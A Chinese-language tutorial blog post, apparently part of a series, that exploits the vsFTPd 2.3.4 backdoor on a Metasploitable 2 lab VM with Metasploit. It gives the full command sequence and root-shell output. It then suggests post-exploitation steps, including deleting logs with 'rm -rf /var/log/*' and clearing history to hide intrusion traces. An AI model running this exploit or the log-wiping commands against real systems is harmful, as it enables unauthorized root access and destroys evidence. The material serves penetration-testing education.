上一篇文中,我們藉由Nmap蒐集到了靶機中開放的端口及版本資訊,在最後也發現了在我們架設的靶機中,存在FTP上的漏洞,於是今天的目標,便是使用Metasploit來破解這個漏洞。
前情提要:若未安裝kali及靶機,請看上兩篇文:
Day8 VMware及Kali安裝
Day9 常用靶機 : metasploitable 2 安裝教學
本測試僅使用於靶機之間測試,請勿用於外網環境
首先打開kali的terminal 輸入
msfconsole
依照上一篇查出的內容來看,這個漏洞是存在於 vsFTPd 2.3.4 版本,於是我們輸入
search vsftpd
這會查詢與vsftpd相關的漏洞並回傳模組列表:
Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
這邊我們就能找到我們需要的vsftpd_234_backdoor 模組
在找到需要的模組後,輸入以下指令載入模組
use exploit/unix/ftp/vsftpd_234_backdoor
接下來我們需要設置目標的 IP ,我使用192.168.252.132作範例
set RHOSTS 192.168.252.132
設定完畢後,記得輸入show options再做最後的檢查,至少確保RHOSTS 已是目標 IP
確認完設置後,便可以直接攻擊目標 注意:必須確保目標室內網靶機
exploit
如果攻擊成功,會得到一個類似於以下輸出的 shell:
[*] 192.168.252.132:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.252.132:21 - USER: 331 Please specify the password.
[+] 192.168.252.132:21 - Backdoor service has been spawned, handling...
[+] 192.168.252.132:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.252.133:34229 -> 192.168.252.132:6200) at 2024-09-25 09:27:39 -0400
最後可以輸入 id 來確認是否擁有 root 權限,若有成功回傳uid=0(root) gid=0(root)便表示已經以 root 權限取得目標系統的控制權
在成功取得控制後,便可以執行多種指令來進一步探索系統、擴大控制範圍、搜集有價值的資訊,甚至創造持久性後門。
可以使用 whoami、uname、ifconfig、netstat查詢系統、網路資訊
使用find、grep 找尋與密碼有關的資料
在操作完畢後輸入rm -rf /var/log/*可以清除log中的入侵痕跡,也可以輸入history -c來清除命令紀錄
在攻擊完畢後,我們可以直接輸入兩次exit退出。不過如果是在進行經授權的滲透測試,或是模擬駭客的實際攻擊,清除痕跡是最重要的一步,與後門的連接也是要記得斷開。
在經由這兩天的實作,我們已經練習了從端口搜索、漏洞發現到漏洞利用,相信大家對駭客平常在做的事情有了更進一步的了解,不過當然無論是駭客還是資安人士,這都還只是表皮而已,接下來我會介紹更多的攻擊型態及一些理論基礎,大家一起拭目以待吧。